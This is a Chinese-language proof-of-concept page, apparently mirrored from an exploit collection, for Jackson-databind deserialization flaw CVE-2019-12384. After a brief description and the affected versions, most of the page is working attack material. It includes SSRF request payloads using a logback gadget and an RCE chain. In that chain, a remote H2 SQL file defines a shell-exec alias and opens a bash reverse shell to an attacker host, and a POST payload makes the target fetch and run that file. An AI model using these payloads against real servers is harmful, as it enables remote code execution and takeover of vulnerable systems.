mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
82 lines
2.3 KiB
Markdown
82 lines
2.3 KiB
Markdown
|
# Jackson-databind 远程代码执行 CVE-2019-12384
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
多个Redhat产品受此漏洞影响,CVSS评分为8.1,漏洞利用复杂度高。
|
|||
|
|
|
|||
|
|
该漏洞是由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
受影响版本:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Jackson-databind 2.X < 2.9.9.1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
不受影响版本:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Jackson-databind 2.9.9.1
|
|||
|
|
Jackson-databind 2.10
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
### SSRF
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /fuckme HTTP/1.1
|
|||
|
|
Host: 192.168.136.131:8080
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
DNT: 1
|
|||
|
|
Connection: close
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 109
|
|||
|
|
|
|||
|
|
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.136.129:7777/"}]
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
或者直接使用dnslog验证:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://jcqfpe.dnslog.cn/"}]
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
### RCE
|
|||
|
|
|
|||
|
|
首先在vps上放置一个.sql的文件,内容如下:
|
|||
|
|
|
|||
|
|
|
|||
|
|
```sql
|
|||
|
|
CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws java.io.IOException {
|
|||
|
|
String[] command = {"bash", "-c", cmd};
|
|||
|
|
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
|
|||
|
|
return s.hasNext() ? s.next() : ""; }
|
|||
|
|
$;
|
|||
|
|
CALL SHELLEXEC('bash -i >& /dev/tcp/192.168.136.129/7777 0>&1')
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后发送payload,请求远程的sql文件,进行RCE
|
|||
|
|
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /fuckme HTTP/1.1
|
|||
|
|
Host: 192.168.136.131:8080
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
DNT: 1
|
|||
|
|
Connection: close
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 164
|
|||
|
|
|
|||
|
|
poc=["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.136.129/exp.sql'"}]
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
|